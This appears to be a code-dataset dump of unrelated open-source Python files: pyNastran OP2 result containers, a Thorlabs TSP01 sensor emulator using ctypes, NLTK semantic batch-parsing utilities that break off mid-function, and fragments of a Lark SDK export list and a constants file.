UpdateVCReserveReq, UpdateVCReserveRespReserve, UpdateVCReserveResp, GetVCRoomConfigReq, GetVCRoomConfigRespDigitalSignageMaterial, GetVCRoomConfigRespDigitalSignage, GetVCRoomConfigResp, SetVCRoomConfigReqRoomConfigDigitalSignageMaterial, SetVCRoomConfigReqRoomConfigDigitalSignage, SetVCRoomConfigReqRoomConfig, SetVCRoomConfigReq, SetVCRoomConfigResp, Lark, PyLarkError, Response, MethodOption, RawRequestReq, Request, MsgType, ContainerIDType, IDType, DepartmentIDType, MailUserType, EmployeeType, ChatType, ImageType, FileType, CalendarRole, CalendarEventAttendeeType, CalendarType, CalendarPermission, AddMemberPermission, MessageVisibility, MembershipApproval, ModerationPermission, ShareCardPermission, AtAllPermission, EditPermission, HelpdeskDropdownOption, ApprovalWidgetType, ApprovalWidget, ApprovalWidgetOption, ApprovalWidgetList, MessageContentPostItem, 
MessageContentPost, MessageContentPostAll, SheetContent, SheetRuleAttr, logger, ]
StarcoderdataPython
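The record above ends with the public export list of the pylark SDK, which pairs one `*Req`/`*Resp` class with every API call and groups the calls into `Lark*Service` objects. As a rough illustration only (not part of any dataset record): the sketch below uses just names visible in that list; the constructor keywords and the commented-out service call are assumptions about the client's surface, not confirmed by the record.

import pylark

# Assumed constructor signature -- only the Lark class name comes from the list above.
client = pylark.Lark(app_id="cli_xxx", app_secret="xxx")

req = pylark.GetUserInfoReq()  # exported above; its field names are not shown in the record
# Each service is assumed to expose one method per Req/Resp pair, e.g.:
# resp = client.auth.get_user_info(req)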
3211683
<gh_stars>1-10 """Constants are defined here""" TO_DO = 'TO_DO' IN_PROGRESS = 'IN_PROGRESS' DONE = 'DONE'
StarcoderdataPython
83168
from typing import Dict, Any from pyNastran.op2.op2_interface.random_results import ( RADCONS, RAECONS, RASCONS, RAPCONS, RAFCONS, RAGCONS, RANCONS, RADEATC, RAEEATC, RASEATC, RAPEATC, RAFEATC, RAGEATC, RANEATC, ROUGV1, RADEFFM, SRSS, ABS, NRL, AutoCorrelationObjects, PowerSpectralDensityObjects, RootMeansSquareObjects, CumulativeRootMeansSquareObjects, NumberOfCrossingsObjects, PSDObjects, ) from pyNastran.op2.result_objects.design_response import Responses class Results: """storage object for even more op2_results (see op2.op2_results)""" def __init__(self): self.eqexin = None self.gpdt = None self.bgpdt = None self.cddata = [] self.monitor1 = None self.monitor3 = None self.responses = Responses() self.separation_initial = {} self.separation_final = {} self.psds = PSDObjects() self.ato = AutoCorrelationObjects() self.psd = PowerSpectralDensityObjects() self.rms = RootMeansSquareObjects() self.no = NumberOfCrossingsObjects() self.crm = CumulativeRootMeansSquareObjects() self.acoustic = Acoustic() self.modal_contribution = ModalContribution() self.solution_set = SolutionSet() self.strength_ratio = StrengthRatio() self.failure_indices = FailureIndices() self.force = Force() self.thermal_load = ThermalLoad() self.stress = Stress() self.strain = Strain() self.strain_energy = StrainEnergy() self.ROUGV1 = ROUGV1() # relative disp/vel/acc/eigenvectors self.RADEFFM = RADEFFM() # eigenvectors self.RADCONS = RADCONS() # eigenvectors self.RAFCONS = RAFCONS() # force self.RASCONS = RASCONS() # stress self.RAECONS = RAECONS() # strain self.RAGCONS = RAGCONS() # grid point forces self.RAPCONS = RAPCONS() # composite stress self.RANCONS = RANCONS() # strain energy self.RADEATC = RADEATC() # eigenvectors self.RAFEATC = RAFEATC() # force self.RASEATC = RASEATC() # stress self.RAEEATC = RAEEATC() # strain self.RAGEATC = RAGEATC() # grid point forces self.RAPEATC = RAPEATC() # composite stress self.RANEATC = RANEATC() # strain energy self.srss = SRSS() self.abs = ABS() self.nrl = NRL() self.cstm = CSTM() self.trmbd = TRMBD() self.trmbu = TRMBU() def _get_sum_objects_map(self): sum_objs = { 'acoustic' : self.acoustic, 'responses' : self.responses, 'force' : self.force, 'thermal_load' : self.thermal_load, 'strain_energy' : self.strain_energy, 'stress': self.stress, 'strain': self.strain, #self.ato, #self.psd, #self.rms, #self.no, #self.crm, #self.modal_contribution, #self.strength_ratio, #self.failure_indices, #self.solution_set, #self.ROUGV1, #self.RADEFFM, #self.RADCONS, self.RAFCONS, self.RASCONS, self.RAECONS, self.RAGCONS, self.RAPCONS, self.RANCONS, #self.RADEATC, self.RAFEATC, self.RASEATC, self.RAEEATC, self.RAGEATC, self.RAPEATC, self.RANEATC, } return sum_objs def _get_sum_objects(self): sum_objs = [ self.acoustic, self.responses, self.force, self.thermal_load, self.stress, self.strain, self.strain_energy, self.ato, self.psd, self.rms, self.no, self.crm, self.modal_contribution, self.strength_ratio, self.failure_indices, self.solution_set, self.ROUGV1, self.RADEFFM, self.RADCONS, self.RAFCONS, self.RASCONS, self.RAECONS, self.RAGCONS, self.RAPCONS, self.RANCONS, self.RADEATC, self.RAFEATC, self.RASEATC, self.RAEEATC, self.RAGEATC, self.RAPEATC, self.RANEATC, self.srss, self.abs, self.nrl, ] return sum_objs def _get_base_objects_map(self) -> Dict[str, Any]: """gets only the objects that are do not contain sub-objects""" base_names = [ 'eqexin', 'gpdt', 'bgpdt', 'psds', 'monitor1', 'monitor3', 'separation_initial', 'separation_final', ] base_objs_map = {} for base_name in base_names: obj = 
getattr(self, base_name) if obj: base_objs_map[base_name] = obj return base_objs_map def get_table_types(self): """combines all the table_types from all objects and sub-objects""" base = [ 'eqexin', 'gpdt', 'bgpdt', 'psds', 'monitor1', 'monitor3', 'separation_initial', 'separation_final', ] sum_objs = self._get_sum_objects() for objs in sum_objs: base.extend(objs.get_table_types()) return base def __repr__(self): msg = 'Results:\n' # all these objects have data base_obj_map = self._get_base_objects_map() sum_obj_map = self._get_sum_objects_map() for key, obj in base_obj_map.items(): msg += f' {key}\n' for key, obj in sum_obj_map.items(): sub_results = obj.get_table_types() msgi = '' for sub_result in sub_results: unused_base, sub_result2 = sub_result.split('.') res = getattr(obj, sub_result2) if res is None or res == {}: continue msgi += f' {sub_result2}\n' #msg += f' {key}\n' if msgi: msg += f' {key}:\n' msg += msgi return msg class SolutionSet: def __init__(self): self.displacements = {} self.velocities = {} self.accelerations = {} self.eigenvectors = {} def get_table_types(self): tables = [ 'displacements', 'velocities', 'accelerations', 'eigenvectors', ] return ['solution_set.' + table for table in tables] class Acoustic: def __init__(self): self.displacements = {} def get_table_types(self): tables = [ 'displacements', ] return ['acoustic.' + table for table in tables] class ModalContribution: def __init__(self): self.displacements = {} self.celas1_stress = {} self.celas2_stress = {} self.celas3_stress = {} self.celas4_stress = {} self.celas1_strain = {} self.celas2_strain = {} self.celas3_strain = {} self.celas4_strain = {} self.crod_stress = {} self.conrod_stress = {} self.ctube_stress = {} self.crod_strain = {} self.conrod_strain = {} self.ctube_strain = {} self.cbend_stress = {} self.ctetra_stress = {} self.cpenta_stress = {} self.chexa_stress = {} self.ctetra_strain = {} self.cpenta_strain = {} self.chexa_strain = {} self.cbar_stress = {} self.cbar_strain = {} self.cbeam_stress = {} self.cbeam_strain = {} self.ctria3_stress = {} self.ctria6_stress = {} self.cquad4_stress = {} self.cquad8_stress = {} self.cquadr_stress = {} self.ctriar_stress = {} self.ctria3_strain = {} self.ctria6_strain = {} self.cquad4_strain = {} self.cquad8_strain = {} self.cquadr_strain = {} self.ctriar_strain = {} self.cquad4_composite_stress = {} self.cquad8_composite_stress = {} self.cquadr_composite_stress = {} self.ctria3_composite_stress = {} self.ctria6_composite_stress = {} self.ctriar_composite_stress = {} self.cquad4_composite_strain = {} self.cquad8_composite_strain = {} self.cquadr_composite_strain = {} self.ctria3_composite_strain = {} self.ctria6_composite_strain = {} self.ctriar_composite_strain = {} self.cshear_stress = {} self.cshear_strain = {} self.cshear_force = {} self.cbush_stress = {} self.cbush_strain = {} def get_table_types(self): tables = [ 'displacements', # 'velocities', 'accelerations', #'load_vectors', 'spc_forces', 'mpc_forces', #'celas1_force', 'celas2_force', 'celas3_force', 'celas4_force', #'crod_force', 'conrod_force', 'ctube_force', #'cbar_force', 'cbeam_force', #'cquad4_force', 'cquad8_force', 'cquadr_force', #'ctria3_force', 'ctria6_force', 'ctriar_force', 'celas1_stress', 'celas2_stress', 'celas3_stress', 'celas4_stress', 'crod_stress', 'conrod_stress', 'ctube_stress', 'cbar_stress', 'cbeam_stress', 'ctria3_stress', 'ctriar_stress', 'ctria6_stress', 'cquadr_stress', 'cquad4_stress', 'cquad8_stress', 'ctetra_stress', 'cpenta_stress', 'chexa_stress', 'celas1_strain', 
'celas2_strain', 'celas3_strain', 'celas4_strain', 'crod_strain', 'conrod_strain', 'ctube_strain', 'cbar_strain', 'cbeam_strain', 'ctria3_strain', 'ctriar_strain', 'ctria6_strain', 'cquadr_strain', 'cquad4_strain', 'cquad8_strain', 'ctetra_strain', 'cpenta_strain', 'chexa_strain', 'cbend_stress', # 'cbend_strain', 'cbend_force', 'cbush_stress', 'cbush_strain', 'cshear_stress', 'cshear_strain', 'cshear_force', 'cquad4_composite_stress', 'cquad8_composite_stress', 'cquadr_composite_stress', 'ctria3_composite_stress', 'ctria6_composite_stress', 'ctriar_composite_stress', 'cquad4_composite_strain', 'cquad8_composite_strain', 'cquadr_composite_strain', 'ctria3_composite_strain', 'ctria6_composite_strain', 'ctriar_composite_strain', #'cbush_force', #'cdamp1_force', 'cdamp2_force', 'cdamp3_force', 'cdamp4_force', #'cvisc_force', ] return ['modal_contribution.' + table for table in tables] class StrengthRatio: def __init__(self): self.cquad4_composite_stress = {} self.cquad8_composite_stress = {} self.cquadr_composite_stress = {} self.ctria3_composite_stress = {} self.ctria6_composite_stress = {} self.ctriar_composite_stress = {} self.cquad4_composite_strain = {} self.cquad8_composite_strain = {} self.cquadr_composite_strain = {} self.ctria3_composite_strain = {} self.ctria6_composite_strain = {} self.ctriar_composite_strain = {} def get_table_types(self): tables = [ 'cquad4_composite_stress', 'cquad8_composite_stress', 'cquadr_composite_stress', 'ctria3_composite_stress', 'ctria6_composite_stress', 'ctriar_composite_stress', 'cquad4_composite_strain', 'cquad8_composite_strain', 'cquadr_composite_strain', 'ctria3_composite_strain', 'ctria6_composite_strain', 'ctriar_composite_strain', ] return ['strength_ratio.' + table for table in tables] class FailureIndices: def __init__(self): self.cquad4_composite_force = {} self.cquad8_composite_force = {} self.cquadr_composite_force = {} self.ctria3_composite_force = {} self.ctria6_composite_force = {} self.ctriar_composite_force = {} def get_table_types(self): tables = [ 'cquad4_composite_force', 'cquad8_composite_force', 'cquadr_composite_force', 'ctria3_composite_force', 'ctria6_composite_force', 'ctriar_composite_force', ] return ['failure_indices.' 
        + table for table in tables]


class Force:
    def __init__(self):
        self.celas1_force = {}
        self.celas2_force = {}
        self.celas3_force = {}
        self.celas4_force = {}

        self.cdamp1_force = {}
        self.cdamp2_force = {}
        self.cdamp3_force = {}
        self.cdamp4_force = {}

        self.crod_force = {}
        self.conrod_force = {}
        self.ctube_force = {}

        self.cbeam_force = {}
        self.cbar_force = {}

        self.ctria3_force = {}
        self.ctria6_force = {}
        self.ctriar_force = {}
        self.cquad4_force = {}
        self.cquad8_force = {}
        self.cquadr_force = {}

        self.cvisc_force = {}
        self.cgap_force = {}
        self.cbear_force = {}
        self.cbush_force = {}
        self.cfast_force = {}
        self.cweld_force = {}
        self.cbend_force = {}
        self.cshear_force = {}
        self.cconeax_force = {}

        # solidPressureForces
        self.chexa_pressure_force = {}
        self.cpenta_pressure_force = {}
        self.ctetra_pressure_force = {}
        self.cpyram_pressure_force = {}

    def get_table_types(self):
        tables = [
            # 0d
            'celas1_force', 'celas2_force', 'celas3_force', 'celas4_force',
            'cdamp1_force', 'cdamp2_force', 'cdamp3_force', 'cdamp4_force',
            'cvisc_force', 'cgap_force', 'cbush_force', 'cconeax_force',

            # 1d
            'crod_force', 'conrod_force', 'ctube_force',
            'cbar_force', 'cbeam_force', 'cbend_force',
            'cfast_force', 'cweld_force', 'cbear_force',

            # 2d
            'ctria3_force', 'ctria6_force', 'ctriar_force',
            'cquad4_force', 'cquad8_force', 'cquadr_force',
            'cshear_force',

            # solid pressure forces
            'chexa_pressure_force', 'cpenta_pressure_force',
            'ctetra_pressure_force', 'cpyram_pressure_force',
        ]
        return ['force.' + table for table in tables]


class ThermalLoad:
    def __init__(self):
        # OEF - Fluxes - tCode=4 thermal=1
        self.conv_thermal_load = {}

        #self.thermalLoad_CHBDY = {}
        self.chbdye_thermal_load = {}
        self.chbdyg_thermal_load = {}
        self.chbdyp_thermal_load = {}
        self.chbdye_thermal_load_flux = {}
        self.chbdyg_thermal_load_flux = {}
        self.chbdyp_thermal_load_flux = {}

        #self.thermalLoad_1D
        self.crod_thermal_load = {}
        self.cbeam_thermal_load = {}
        self.ctube_thermal_load = {}
        self.conrod_thermal_load = {}
        self.cbar_thermal_load = {}
        self.cbend_thermal_load = {}
        self.crod_thermal_load_flux = {}
        self.cbeam_thermal_load_flux = {}
        self.ctube_thermal_load_flux = {}
        self.conrod_thermal_load_flux = {}
        self.cbar_thermal_load_flux = {}
        self.cbend_thermal_load_flux = {}

        #self.thermalLoad_2D_3D
        self.cquad4_thermal_load = {}
        self.ctriax6_thermal_load = {}
        self.cquad8_thermal_load = {}
        self.ctria3_thermal_load = {}
        self.ctria6_thermal_load = {}
        self.ctetra_thermal_load = {}
        self.chexa_thermal_load = {}
        self.cpenta_thermal_load = {}

        self.cquad4_thermal_load_flux = {}
        self.ctriax6_thermal_load_flux = {}
        self.cquad8_thermal_load_flux = {}
        self.ctria3_thermal_load_flux = {}
        self.ctria6_thermal_load_flux = {}
        self.ctetra_thermal_load_flux = {}
        self.chexa_thermal_load_flux = {}
        self.cpenta_thermal_load_flux = {}
        #self.temperatureForces = {}

    def get_table_types(self):
        tables = [
            'conv_thermal_load',
            # flux
            'chbdye_thermal_load', 'chbdyg_thermal_load', 'chbdyp_thermal_load',
            'chbdye_thermal_load_flux', 'chbdyg_thermal_load_flux', 'chbdyp_thermal_load_flux',
            # 1D
            'crod_thermal_load', 'cbeam_thermal_load', 'ctube_thermal_load',
            'conrod_thermal_load', 'cbar_thermal_load', 'cbend_thermal_load',
            'crod_thermal_load_flux', 'cbeam_thermal_load_flux', 'ctube_thermal_load_flux',
            'conrod_thermal_load_flux', 'cbar_thermal_load_flux', 'cbend_thermal_load_flux',
            #self.thermalLoad_2D_3D
            'cquad4_thermal_load', 'ctriax6_thermal_load', 'cquad8_thermal_load',
            'ctria3_thermal_load', 'ctria6_thermal_load',
            'ctetra_thermal_load', 'chexa_thermal_load', 'cpenta_thermal_load',
            # 2d/3d
            'cquad4_thermal_load_flux', 'ctriax6_thermal_load_flux', 'cquad8_thermal_load_flux',
            'ctria3_thermal_load_flux', 'ctria6_thermal_load_flux',
            'ctetra_thermal_load_flux', 'chexa_thermal_load_flux', 'cpenta_thermal_load_flux',
        ]
        return ['thermal_load.' + table for table in tables]


class Stress:
    def __init__(self):
        self.celas1_stress = {}
        self.celas2_stress = {}
        self.celas3_stress = {}
        self.celas4_stress = {}

        self.ctetra_stress = {}
        self.cpenta_stress = {}
        self.chexa_stress = {}
        self.cpyram_stress = {}

        # 269, 270
        self.chexa_composite_stress = {}
        self.cpenta_composite_stress = {}

    def get_table_types(self):
        tables = [
            # OES - CELAS1/CELAS2/CELAS3/CELAS4 stress
            'celas1_stress', 'celas2_stress', 'celas3_stress', 'celas4_stress',
            # OES - isotropic CTETRA/CHEXA/CPENTA stress
            'ctetra_stress', 'cpenta_stress', 'chexa_stress', 'cpyram_stress',
            'chexa_composite_stress', 'cpenta_composite_stress',
        ]
        return ['stress.' + table for table in tables]


class Strain:
    def __init__(self):
        self.ctetra_strain = {}
        self.cpenta_strain = {}
        self.chexa_strain = {}
        self.cpyram_strain = {}

        # springs
        self.celas1_strain = {}
        self.celas2_strain = {}
        self.celas3_strain = {}
        self.celas4_strain = {}

        # 269, 270
        self.chexa_composite_strain = {}
        self.cpenta_composite_strain = {}

    def get_table_types(self):
        tables = [
            # OES - CELAS1/CELAS2/CELAS3/CELAS4 strain
            'celas1_strain', 'celas2_strain', 'celas3_strain', 'celas4_strain',
            # OES - isotropic CTETRA/CHEXA/CPENTA strain
            'ctetra_strain', 'cpenta_strain', 'chexa_strain', 'cpyram_strain',
            'chexa_composite_strain', 'cpenta_composite_strain',
        ]
        return ['strain.' + table for table in tables]


class StrainEnergy:
    def __init__(self):
        """
        OEE - strain energy density; tCode=18
        """
        self.celas1_strain_energy = {}
        self.celas2_strain_energy = {}
        self.celas3_strain_energy = {}
        self.celas4_strain_energy = {}

        self.cdamp1_strain_energy = {}
        self.cdamp2_strain_energy = {}
        self.cdamp3_strain_energy = {}
        self.cdamp4_strain_energy = {}

        self.cquad4_strain_energy = {}
        self.cquad8_strain_energy = {}
        self.cquadr_strain_energy = {}
        self.cquadx_strain_energy = {}

        self.ctria3_strain_energy = {}
        self.ctria6_strain_energy = {}
        self.ctriar_strain_energy = {}
        self.ctriax_strain_energy = {}
        self.ctriax6_strain_energy = {}

        self.ctetra_strain_energy = {}
        self.cpenta_strain_energy = {}
        self.chexa_strain_energy = {}
        self.cpyram_strain_energy = {}

        self.crod_strain_energy = {}
        self.ctube_strain_energy = {}
        self.conrod_strain_energy = {}

        self.cbar_strain_energy = {}
        self.cbeam_strain_energy = {}
        self.cbend_strain_energy = {}
        self.cbeam3_strain_energy = {}

        self.cgap_strain_energy = {}
        self.cdum8_strain_energy = {}
        self.cbush_strain_energy = {}
        #self.chexa8fd_strain_energy = {}
        self.dmig_strain_energy = {}
        self.genel_strain_energy = {}
        self.cshear_strain_energy = {}
        self.conm2_strain_energy = {}
        self.rbe1_strain_energy = {}
        self.rbe3_strain_energy = {}
        self.cweld_strain_energy = {}
        self.cfast_strain_energy = {}
        self.cseam_strain_energy = {}

    def get_table_types(self):
        tables = [
            # OEE - strain energy density
            # tCode=18
            'cquad4_strain_energy', 'cquad8_strain_energy', 'cquadr_strain_energy',
            'cquadx_strain_energy',

            'ctria3_strain_energy', 'ctria6_strain_energy', 'ctriar_strain_energy',
            'ctriax_strain_energy', 'ctriax6_strain_energy',

            'cshear_strain_energy',

            'ctetra_strain_energy', 'cpenta_strain_energy',
            'chexa_strain_energy', 'cpyram_strain_energy',

            'crod_strain_energy', 'ctube_strain_energy', 'conrod_strain_energy',

            'cbar_strain_energy', 'cbeam_strain_energy', 'cbeam3_strain_energy',

            'cgap_strain_energy',
            'cbush_strain_energy',
            'celas1_strain_energy', 'celas2_strain_energy',
            'celas3_strain_energy', 'celas4_strain_energy',

            'cdamp1_strain_energy', 'cdamp2_strain_energy',
            'cdamp3_strain_energy', 'cdamp4_strain_energy',

            'cdum8_strain_energy',
            #'chexa8fd_strain_energy'
            'cbend_strain_energy',
            'dmig_strain_energy',
            'genel_strain_energy',
            'conm2_strain_energy',
            'rbe1_strain_energy', 'rbe3_strain_energy',
            'cweld_strain_energy', 'cfast_strain_energy', 'cseam_strain_energy',
        ]
        return ['strain_energy.' + table for table in tables]


class CSTM:
    def __init__(self):
        self.headers = {
            "cid": 0, "cid_type": 1,
            "unused_int_index": 2, "unused_double_index": 3,
            "ox": 4, "oy": 5, "oz": 6,
            "T11": 7, "T12": 8, "T13": 9,
            "T21": 10, "T22": 11, "T23": 12,
            "T31": 13, "T32": 14, "T33": 15,
        }
        # Coordinate Transformation Matrices from Native to Global
        self.data = None  # type: Optional[np.ndarray]

    def __repr__(self) -> str:
        msg = 'CSTM:\n'
        msg += f'  headers_str = {self.headers.keys()}\n'
        msg += f'  headers_ints = {self.headers.values()}\n'
        if self.data is not None:
            msg += f'  data.shape = {self.data.shape}'
        else:
            msg += '  data = None'
        return msg


class TRMBD:
    def __init__(self):
        self.nodes = {}
        self.eulersx = {}
        self.eulersy = {}
        self.eulersz = {}

    def __repr__(self) -> str:
        msg = 'TRMBD:\n'
        msg += '  nodes, eulersx, eulersy, eulersz'
        return msg


class TRMBU:
    def __init__(self):
        self.eulers = {}

    def __repr__(self) -> str:
        msg = 'TRMBU:\n'
        msg += '  eulers'
        return msg
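
# Hedged usage sketch (added for illustration; the ``Results`` wrapper below is
# hypothetical and not part of the original module): every container above
# exposes get_table_types(), which returns dotted attribute paths such as
# 'force.cbar_force'. Those paths let a caller walk all populated result
# tables generically.
if __name__ == '__main__':
    class Results:
        """Hypothetical aggregator over the containers defined above."""
        def __init__(self):
            self.force = Force()
            self.stress = Stress()
            self.strain = Strain()
            self.strain_energy = StrainEnergy()
            self.thermal_load = ThermalLoad()

        def get_populated_tables(self):
            groups = (self.force, self.stress, self.strain,
                      self.strain_energy, self.thermal_load)
            for group in groups:
                for name in group.get_table_types():
                    # 'force.cbar_force' -> getattr(self.force, 'cbar_force')
                    group_name, table_name = name.split('.')
                    table = getattr(getattr(self, group_name), table_name)
                    if table:  # each table is a dict keyed by subcase id
                        yield name, table

    res = Results()
    res.force.cbar_force[1] = 'placeholder CBAR force table for subcase 1'
    print(list(res.get_populated_tables()))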
# ==== StarcoderdataPython record 3365280 ====
# Source: spacetelescope/instrument-interface-library :: catkit/emulators/thorlabs/TSP01.py
import ctypes

c_void_p = ctypes.POINTER(ctypes.c_void_p)
c_int_p = ctypes.POINTER(ctypes.c_int)
c_double_p = ctypes.POINTER(ctypes.c_double)


class TSP01Emulator(ctypes.Structure):
    _fields_ = [("serial_number", ctypes.c_char_p),
                ("temp", ctypes.c_double),
                ("humidity", ctypes.c_double)]

    def __init__(self, serial_number, temp, humidity):
        self.serial_number = serial_number.encode()
        self.temp = temp
        self.humidity = humidity

    def TLTSPB_init(self, device_name, id_query, reset_device, connection):
        # int TLTSPB_init(char * device_name, bool id_query, bool reset_device, void ** connection)
        connection_p = ctypes.cast(connection, c_void_p)  # deref ctypes.byref()
        connection_p.contents.value = ctypes.addressof(self)
        # NOTE: E.g., ``self.temp`` is accessible via:
        # TSP01Emulator_p = ctypes.POINTER(TSP01Emulator)
        # new_self = ctypes.cast(connection, TSP01Emulator_p).contents
        # new_self.temp
        return 0

    @staticmethod
    def TLTSPB_close(connection):
        # int TLTSPB_close(void * connection)
        return 0

    def TLTSPB_measTemperature(self, connection, channel, temp):
        # int TLTSPB_getTemperatureData(void * connection, int channel, double * temp)
        pointer = ctypes.cast(temp, c_double_p)  # deref ctypes.byref()
        pointer.contents.value = self.temp
        return 0

    def TLTSPB_measHumidity(self, connection, humidity):
        # int TLTSPB_getHumidityData(void * connection, ?, double * humidity)
        pointer = ctypes.cast(humidity, c_double_p)  # deref ctypes.byref()
        pointer.contents.value = self.humidity
        return 0

    @staticmethod
    def TLTSPB_errorMessage(connection, status_code, error_message):
        # int TLTSPB_errorMessage(void * connection, int status_code, char * error_message)
        error_message.value = "Error".encode()
        return 0

    @staticmethod
    def TLTSPB_findRsrc(connection, device_count):
        # int TLTSPB_findRsrc(void * connection, int * device_count)
        pointer = ctypes.cast(device_count, c_int_p)  # deref ctypes.byref()
        pointer.contents.value = 1
        return 0

    def TLTSPB_getRsrcName(self, connection, device_index, buffer):
        # int TLTSPB_getRsrcName(void * connection, int device_index, char * buffer)
        buffer.value = self.serial_number
        return 0
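
# Hedged usage sketch (added for illustration, not part of the emulator file):
# drives the emulator the way ctypes client code would drive the real TLTSPB
# DLL, passing out-parameters with ctypes.byref() exactly as the
# "deref ctypes.byref()" comments above expect. The device name and readings
# below are made up.
if __name__ == '__main__':
    dev = TSP01Emulator('M00123456', temp=21.5, humidity=43.0)

    # TLTSPB_init() writes the emulator's address into a void** out-parameter.
    connection = ctypes.c_void_p()
    assert dev.TLTSPB_init(b'USB0::0x1313::0x80F8', True, False,
                           ctypes.byref(connection)) == 0

    # Read a measurement back through a double* out-parameter.
    temp = ctypes.c_double()
    assert dev.TLTSPB_measTemperature(connection, 1, ctypes.byref(temp)) == 0
    print(temp.value)  # -> 21.5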
# ==== StarcoderdataPython record 1684219 ====
# Natural Language Toolkit: Semantic Interpretation
#
# Author: <NAME> <<EMAIL>>
#
# Copyright (C) 2001-2013 NLTK Project
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT

"""
Utility functions for batch-processing sentences: parsing and
extraction of the semantic representation of the root node of
the syntax tree, followed by evaluation of the semantic
representation in a first-order model.
"""
from __future__ import print_function, unicode_literals

import re
import codecs

from . import evaluate


##############################################################
## Utility functions for connecting parse output to semantics
##############################################################

def batch_parse(inputs, grammar, trace=0):
    """
    Convert input sentences into syntactic trees.

    :param inputs: sentences to be parsed
    :type inputs: list of str
    :param grammar: ``FeatureGrammar`` or name of feature-based grammar
    :rtype: list
    :return: a list (one entry per input sentence) of lists of parse ``Tree``s
    """
    # put imports here to avoid circular dependencies
    from nltk.grammar import FeatureGrammar
    from nltk.parse import FeatureChartParser, load_parser

    if isinstance(grammar, FeatureGrammar):
        cp = FeatureChartParser(grammar)
    else:
        cp = load_parser(grammar, trace=trace)

    parses = []
    for sent in inputs:
        tokens = sent.split()  # use a tokenizer?
        syntrees = cp.nbest_parse(tokens)
        parses.append(syntrees)
    return parses


def root_semrep(syntree, semkey='SEM'):
    """
    Find the semantic representation at the root of a tree.

    :param syntree: a parse ``Tree``
    :param semkey: the feature label to use for the root semantics in the tree
    :return: the semantic representation at the root of a ``Tree``
    :rtype: sem.Expression
    """
    from nltk.grammar import FeatStructNonterminal

    node = syntree.label()
    assert isinstance(node, FeatStructNonterminal)
    try:
        return node[semkey]
    except KeyError:
        print(node, end=' ')
        print("has no specification for the feature %s" % semkey)
        raise


def batch_interpret(inputs, grammar, semkey='SEM', trace=0):
    """
    Add the semantic representation to each syntactic parse tree
    of each input sentence.

    :param inputs: a list of sentences
    :param grammar: ``FeatureGrammar`` or name of feature-based grammar
    :return: a list (one entry per sentence) of lists of pairs
        (parse-tree, semantic-representation)
    :rtype: list
    """
    return [[(syn, root_semrep(syn, semkey)) for syn in syntrees]
            for syntrees in batch_parse(inputs, grammar, trace=trace)]


def batch_evaluate(inputs, grammar, model, assignment, trace=0):
    """
    Add the truth-in-a-model value to each semantic representation
    for each syntactic parse of each input sentence.

    :param inputs: a list of sentences
    :param grammar: ``FeatureGrammar`` or name of feature-based grammar
    :return: a list (one entry per sentence) of lists of triples
        (parse-tree, semantic-representation, evaluation-in-model)
    :rtype: list
    """
    return [[(syn, sem, model.evaluate("%s" % sem, assignment, trace=trace))
             for (syn, sem) in interpretations]
            for interpretations in batch_interpret(inputs, grammar)]


##########################################
# REs used by the parse_valuation function
##########################################
_VAL_SPLIT_RE = re.compile(r'\s*=+>\s*')
_ELEMENT_SPLIT_RE = re.compile(r'\s*,\s*')
_TUPLES_RE = re.compile(r"""\s*
                            (\([^)]+\))  # tuple-expression
                            \s*""", re.VERBOSE)


def parse_valuation_line(s, encoding=None):
    """
    Parse a line in a valuation file.

    Lines are expected to be of the form::

      noosa => n
      girl => {g1, g2}
      chase => {(b1, g1), (b2, g1), (g1, d1), (g2, d2)}

    :param s: input line
    :type s: str
    :param encoding: the encoding of the input string, if it is binary
    :type encoding: str
    :return: a pair (symbol, value)
    :rtype: tuple
    """
    if encoding is not None:
        s = s.decode(encoding)
    pieces = _VAL_SPLIT_RE.split(s)
    symbol = pieces[0]
    value = pieces[1]
    # check whether the value is meant to be a set
    if value.startswith('{'):
        value = value[1:-1]
        tuple_strings = _TUPLES_RE.findall(value)
        # are the set elements tuples?
        if tuple_strings:
            set_elements = []
            for ts in tuple_strings:
                ts = ts[1:-1]
                element = tuple(_ELEMENT_SPLIT_RE.split(ts))
                set_elements.append(element)
        else:
            set_elements = _ELEMENT_SPLIT_RE.split(value)
        value = set(set_elements)
    return symbol, value


def parse_valuation(s, encoding=None):
    """
    Convert a valuation file into a valuation.

    :param s: the contents of a valuation file
    :type s: str
    :param encoding: the encoding of the input string, if it is binary
    :type encoding: str
    :return: a ``nltk.sem`` valuation
    :rtype: Valuation
    """
    if encoding is not None:
        s = s.decode(encoding)
    statements = []
    for linenum, line in enumerate(s.splitlines()):
        line = line.strip()
        if line.startswith('#') or line == '':
            continue
        try:
            statements.append(parse_valuation_line(line))
        except ValueError:
            raise ValueError('Unable to parse line %s: %s' % (linenum, line))
    val = evaluate.Valuation(statements)
    return val


def demo_model0():
    global m0, g0
    # Initialize a valuation of non-logical constants.
    v = [('john', 'b1'),
         ('mary', 'g1'),
         ('suzie', 'g2'),
         ('fido', 'd1'),
         ('tess', 'd2'),
         ('noosa', 'n'),
         ('girl', set(['g1', 'g2'])),
         ('boy', set(['b1', 'b2'])),
         ('dog', set(['d1', 'd2'])),
         ('bark', set(['d1', 'd2'])),
         ('walk', set(['b1', 'g2', 'd1'])),
         ('chase', set([('b1', 'g1'), ('b2', 'g1'), ('g1', 'd1'), ('g2', 'd2')])),
         ('see', set([('b1', 'g1'), ('b2', 'd2'), ('g1', 'b1'),
                      ('d2', 'b1'), ('g2', 'n')])),
         ('in', set([('b1', 'n'), ('b2', 'n'), ('d2', 'n')])),
         ('with', set([('b1', 'g1'), ('g1', 'b1'), ('d1', 'b1'), ('b1', 'd1')]))
         ]
    # Read in the data from ``v``
    val = evaluate.Valuation(v)
    # Bind ``dom`` to the ``domain`` property of ``val``
    dom = val.domain
    # Initialize a model with parameters ``dom`` and ``val``.
    m0 = evaluate.Model(dom, val)
    # Initialize a variable assignment with parameter ``dom``
    g0 = evaluate.Assignment(dom)


def read_sents(filename, encoding='utf8'):
    with codecs.open(filename, 'r', encoding) as fp:
        sents = [l.rstrip() for l in fp]

    # get rid of blank lines
    sents = [l for l in sents if len(l) > 0]
    sents = [l for l in sents if not l[0] == '#']
    return sents


def demo_legacy_grammar():
    """
    Check that batch_interpret() is compatible with legacy grammars
    that use a lowercase 'sem' feature; the inline grammar below
    stands in for the 'test.fcfg' file used by older versions of
    this demo.
    """
    from nltk.grammar import parse_fcfg

    g = parse_fcfg("""
    % start S
    S[sem=<hello>] -> 'hello'
    """)
    print("Reading grammar: %s" % g)
    print("*" * 20)
    for reading in batch_interpret(['hello'], g, semkey='sem'):
